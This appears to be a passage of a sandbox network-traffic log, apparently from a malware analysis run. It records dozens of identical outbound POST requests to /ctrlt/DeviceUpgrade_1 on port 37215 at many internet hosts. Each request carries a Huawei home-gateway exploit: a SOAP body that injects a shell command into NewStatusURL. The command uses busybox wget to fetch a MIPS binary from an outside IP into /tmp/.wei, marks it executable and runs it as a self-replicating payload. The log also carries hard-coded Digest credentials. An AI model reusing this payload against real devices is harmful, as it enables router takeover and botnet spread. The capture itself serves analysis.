                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1119192.168.2.2339432120.207.92.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299438953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1120192.168.2.2336254197.221.18.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299462080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1121192.168.2.2334612157.134.9.23637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299487114 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1122192.168.2.2336364157.233.227.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299493074 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1123192.168.2.2349554197.35.75.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299505949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1124192.168.2.2358016197.2.204.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299523115 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1125192.168.2.233428297.178.106.5137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299535036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1126192.168.2.2356314154.66.178.16237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299540043 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1127192.168.2.2351984197.138.241.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299546003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1128192.168.2.234360241.50.24.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299554110 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
